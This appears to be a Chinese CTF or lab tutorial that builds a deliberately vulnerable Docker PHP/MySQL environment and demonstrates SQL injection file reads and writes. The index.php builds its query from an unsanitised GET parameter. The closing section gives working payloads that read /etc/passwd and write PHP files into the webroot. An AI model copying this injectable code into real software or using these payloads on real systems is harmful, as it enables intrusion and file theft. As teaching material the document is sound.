1. 利用docker搭建环境

1. Dockerfile编写

#拉取镜像
FROM ubuntu:16.04
# 设置utf-8
ENV LANG c.UTF-8
# 设置非交互式环境
ENV DEBIAN_FRONTEND noninteractive 

COPY ./docker/sources.list /etc/apt/sources.list
# 安装 apache2 mysql php 以及 php相关插件
RUN  	apt-get -y update && \
	apt-get -yqq install php libapache2-mod-php  && \
	apt-get -yqq install mysql-server && \
	apt-get -yqq install php-mysql php-curl && \
	rm /var/www/html/*
# 移去apache2的列目录漏洞,并设置mysql可读写文件
RUN sed -i 's/Options Indexes FollowSymLinks/Options None/' /etc/apache2/apache2.conf && \
	sed -i '$a secure_file_priv= ' /etc/mysql/mysql.conf.d/mysqld.cnf

ADD ./sources/CTF.tar /var/www/html/

COPY ./docker/ctf.sql /root/

# 修改权限
RUN chown www-data:www-data /var/www/html/* \ 
	&& cd /var/www/html \
	&& chmod 777 ./* .
COPY ./docker/start.sh /root/

RUN chmod +x /root/start.sh

ENTRYPOINT cd /root; ./start.sh
EXPOSE 80

2.start.sh

#!/bin/bash
sleep 1
service mysql restart
mysqladmin -u root password "Cdusec123456"
mysql -u root -pCdusec123456 < /root/ctf.sql
/usr/sbin/apache2ctl -D FOREGROUND

3.ctf.sql

CREATE DATABASE IF NOT EXISTS ctfC;
use ctfC;
create table IF NOT EXISTS admins (id int(10) PRIMARY KEY AUTO_INCREMENT,username varchar(100),password varchar(100));
insert admins values ('1','admin','flag{flag_is_not_there}');
insert admins values ('2','admin1','flag{flag_is_not_there}');
insert admins values ('3','admin2','flag{flag_is_not_there}');
insert admins values ('4','admin3','flag{flag_is_not_there}');

4.index.php

<?php

class Mysql {
    public function __construct($servername = "127.0.0.1",$username ="root",$password = "Cdusec123456",$dbname = "ctfC")
    {
        $this->servername =$servername;
        $this->username =$username;
        $this->password =$password;
        $this->dbname =$dbname;
        $this->con = $this->conn();
    }
    public function __destruct()
    {
        // TODO: Implement __destruct() method.
        $this->con->close();
    }

    public function conn()
    {
        $conn = new mysqli($this->servername, $this->username, $this->password, $this->dbname);

        if ($conn->connect_error) {
            die("连接失败: " . $conn->connect_error);
        }else{
            return $conn;
        }

    }
    public function sel($id)
    {
            $sql = "SELECT * FROM admins WHERE id=$id";
            $result = $this->con->query($sql);
            if($result->num_rows > 0){
                while($row = $result->fetch_assoc()) {
                	echo "id: " . $row['id']. " - Name: " . $row['username']. " -Password: " . $row['password']. "<br>";
                	}
                return True;
                }else{
                	return False;
                }

    }
}


$id =$_GET['id'];

$sql = new Mysql();

$re= $sql -> sel($id);
if ($re == True){
	echo "Congratulations";	
}else{
	echo "NO";
}

2.文件写入条件

1.读写文件需要 secure_file_priv权限

  • secure_file_priv = '' //代表对文件写入没有限制
  • secure_file_priv = NULL //代表不能进行文件读写
  • secure_file_priv=/var/tmp//代表不能进行文件写入操作
# 修改/etc/mysql/mysql.cnf.d/mysqld.cnf 中 secure_file_priv 为 ''
sed -i '$a secure_file_priv= '/etc/mysql/mysql.conf.d/mysqld.cnf

2.读取文件

Load_file()

http://192.168.74.138:21101/?id=1 union select 1,'2',load_file('/etc/passwd') --+

3.写入文件

into outfile or into dumpfile //用于二进制文件

http://192.168.74.138:21101/?id=1 union select 1,'<?php phpinfo();?>',3 into outfile '/var/www/html/1.php' --+

http://192.168.74.138:21101/?id=1 union select 1,'<?php phpinfo();?>',3 into dumpfile '/var/www/html/5.php' --+

Q.E.D.